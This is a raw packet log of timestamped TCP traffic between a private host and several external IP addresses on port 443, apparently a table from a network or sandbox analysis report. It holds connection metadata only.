Nov 25, 2024 11:34:08.295434952 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.295452118 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.295523882 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.295523882 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.295528889 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.295593977 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.303587914 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.303603888 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.303692102 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.303699017 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.303817034 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.424490929 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.424519062 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.424613953 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.424614906 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.424635887 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.424724102 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.438498020 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.438519001 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.438643932 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.438653946 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.438705921 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.450521946 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.450545073 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.450647116 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.450647116 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.450656891 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.450794935 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.454411030 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.454511881 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.454518080 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.456383944 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.456402063 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.456486940 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.456486940 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.456495047 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.456569910 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.461469889 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.461488008 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.461522102 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.461529970 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.461551905 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.461574078 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.461587906 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.461662054 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.461671114 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.461716890 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.463175058 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.463197947 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.463282108 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.463282108 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.463289022 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.463335037 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.466042042 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.466181993 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.466188908 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.469903946 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.469921112 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.470005035 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.470011950 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.470063925 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.473084927 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.473099947 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.473177910 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.473177910 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.473186016 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.475730896 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.475752115 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.475811005 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.475816965 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.475860119 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.475860119 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.477643967 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.477772951 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.477780104 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.482907057 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.482925892 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.483030081 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.483030081 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.483036041 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.483102083 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.484761953 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.484781981 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.484850883 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.484850883 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.484858036 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.487791061 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.487819910 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.487879038 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.487891912 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.487891912 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.487931967 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.488639116 CET	49920	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.488648891 CET	443	49920	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.488976955 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.489319086 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.489326000 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.496931076 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.496951103 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.497034073 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.497034073 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.497041941 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.500511885 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.500657082 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.500663042 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.508527994 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.508549929 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.508649111 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.508649111 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.508657932 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.549300909 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.596549034 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.596566916 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.596632957 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.596646070 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.596734047 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.620717049 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.620735884 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.622808933 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.622828007 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.622934103 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.640567064 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.640702963 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.640710115 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.646390915 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.646411896 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.646568060 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.646578074 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.646626949 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.659621000 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.659636974 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.659719944 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.659719944 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.659729004 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.662959099 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.663052082 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.663058043 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.665437937 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.665453911 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.665486097 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.665494919 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.665539026 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.665539026 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.671052933 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.671067953 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.671143055 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.671143055 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.671153069 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.675673962 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.675745010 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.675750971 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.682744980 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.682759047 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.682859898 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.682868004 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.687320948 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.687586069 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.687592983 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.694900036 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.694921017 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.695019007 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.695019007 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.695029974 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.698474884 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.698551893 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.698559999 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.706549883 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.706568003 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.706651926 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.706660032 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.710141897 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.710230112 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.710236073 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.761559963 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.785123110 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.786967039 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.786997080 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.787586927 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.787592888 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.795783997 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.795833111 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.795869112 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.795885086 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.795895100 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.795922995 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.795986891 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.800009012 CET	49924	443	192.168.2.5	172.183.192.109
Nov 25, 2024 11:34:08.800021887 CET	443	49924	172.183.192.109	192.168.2.5
Nov 25, 2024 11:34:08.829298019 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.829329014 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.829524994 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.830004930 CET	49938	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:08.830028057 CET	443	49938	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:08.843327045 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.844297886 CET	49927	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.844326019 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.845037937 CET	49927	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.845046043 CET	443	49927	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.848035097 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.848941088 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.848941088 CET	49926	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.848958969 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.848967075 CET	443	49926	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.857211113 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.857224941 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.857251883 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.857266903 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.857291937 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.857300997 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.857357979 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.857357979 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.860668898 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.860807896 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.860814095 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.868870020 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.868885040 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.868973017 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.868973017 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.868984938 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.873364925 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.873686075 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.873692989 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.880485058 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.880500078 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.880600929 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.880600929 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.880609035 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.885004044 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.885147095 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.885154009 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.892574072 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.892591000 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.892710924 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.892718077 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.896370888 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.896502972 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.896509886 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.904268026 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.904288054 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.904376030 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.904381990 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.904412031 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.905415058 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:08.905440092 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:08.905469894 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:08.905493021 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:08.905499935 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:08.905673981 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:08.906394958 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:08.906394958 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:08.906408072 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:08.906564951 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:08.906599998 CET	443	49923	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:08.906752110 CET	49923	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:08.907816887 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.908006907 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:08.908014059 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:08.914731026 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.917433023 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.917450905 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.920011044 CET	49930	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.920016050 CET	443	49930	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.920186996 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.924859047 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.924859047 CET	49931	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:08.924884081 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.924897909 CET	443	49931	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:08.947859049 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.020018101 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:09.020032883 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:09.020797968 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:09.021143913 CET	49939	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:09.021156073 CET	443	49939	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:09.043574095 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.043598890 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.043675900 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.043684959 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.043711901 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.043946028 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.059086084 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.059165955 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.059173107 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.067104101 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.067120075 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.067231894 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.067231894 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.067240953 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.070631027 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.070758104 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.070765018 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.078706026 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.078720093 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.078843117 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.078851938 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.082340002 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.082407951 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.082420111 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.090351105 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.090365887 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.090538979 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.090547085 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.094383001 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.094454050 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.094460011 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.101526022 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.101546049 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.101597071 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.101603985 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.101648092 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.106036901 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.106126070 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.106132984 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.113123894 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.113137007 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.113213062 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.113220930 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.165632010 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.218111992 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.221226931 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.221306086 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.221539974 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.221559048 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.221571922 CET	49925	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.221579075 CET	443	49925	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.224148989 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.224189997 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.224272013 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.224405050 CET	49940	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:09.224415064 CET	443	49940	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:09.244769096 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.244777918 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.244851112 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.244859934 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.264091969 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.264106989 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.264131069 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.264173985 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.264180899 CET	443	49902	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:09.264224052 CET	49902	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:09.268668890 CET	443	49902	23.209.72.7	192.168.2.5
